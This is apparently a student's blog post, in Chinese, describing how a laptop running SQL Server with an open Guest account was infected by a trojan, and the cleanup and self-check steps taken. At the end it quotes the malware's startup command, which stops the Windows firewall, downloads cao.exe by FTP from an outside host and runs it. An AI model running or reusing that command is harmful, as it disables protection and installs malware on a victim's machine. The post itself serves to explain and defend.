交待一下背景:最近在做毕业设计,笔记本上开启了Guest用户和SQLserver,这两个嫌疑最大。
本次被入侵的原因可能是以下之一:
1、 SQLserver进程可以被侵入(上网搜:isql 病毒)。
2、 Guest用户没有加密码,也许被对方远程扫描到了,通过telnet登录了我的电脑(这个原因的可能性不大)。
被侵入的过程如下:
首先,360提醒我,有一个进程(其实这个是伪装的攻击)修改了注册表,增加了开机启动项。点击查看,启动项是一个cmd命令,进程是sqlsever。360默认允许了,于是我也没管。
然后不对劲了,360和杀毒软件Avast都开始报毒,说是有木马被植入,已经自动拦截——其实没有拦截住。(这是因为,木马一旦侵入,和杀毒软件的资格基本上平起平坐。而且刚才植入的木马进程,已经在后台开启了一个FTP连接,远程下载病毒到我的硬盘)
接着,Avast又报毒,说有一个backdoor后门程序被植入(如上文,刚下载的)。
打开任务管理器,发现后台运行着cmd.exe(命令控制台),ftp.exe(文件传输协议)。这两个进程是我没有默认开启的。
到这儿已经基本确定是被侵入了,立刻断网、关机。
==========================分割线==================================
重启之后,自动弹出一个cmd窗口,企图进行远程FTP连接(目的是下载病毒)——这儿挺幸运的,如果我的电脑是自动联网的,那么这个窗口会一闪而过,在后台运行,不易被察觉。
由于没有联网,所以这个病毒进程卡住了,说是FTP连接失败。
解决方法:
1、开机后按F8,进入安全模式,在C:/windows/system32目录里,找到isql文件夹,彻底删除。
2、 重启,正常模式开机,打开控制面板,禁用Guest账户。
3、 打开360,查杀木马,显示多了一个启动项,这个启动项的目的是通过打开cmd,在后台打开FTP传输——通过它来把病毒进一步下载到硬盘。
4、 查看开机启动项,果然有一个shell(加壳的意思吧?),就是上面这句说的非法操作。
于是果断把它删除。
5、开启windows防火墙。
6、把本机上SQL服务器的sa密码改掉。
7、改掉本机SQL服务器的默认端口1433.
(最后三条操作酌情进行)
重启,查看网络连接,恢复正常了。
平时怀疑自己的电脑中毒了,这样自查一下:
- cmd里面输入netstat,查看当前的网络连接,有没有非法的。
- 用360查看网络连接,这个更容易看懂一些,不过有些进程,比如杀毒软件,会与 远程服务器保持联系,看起来会有嫌疑。
- 你的防护软件如果突然报毒,也是值得怀疑的~
附注:此病毒添加的启动项是:
c:/windows/system32/cmd.exe /c net1 stop sharedaccess&echo open daoke3322.3322.org> cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get cao.exe>> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&cao.exe&cao.exe&del cmd.txt
解释一下就是停止WINDOWS防火墙服务,然后从指定的地址下载病毒,然后删除日志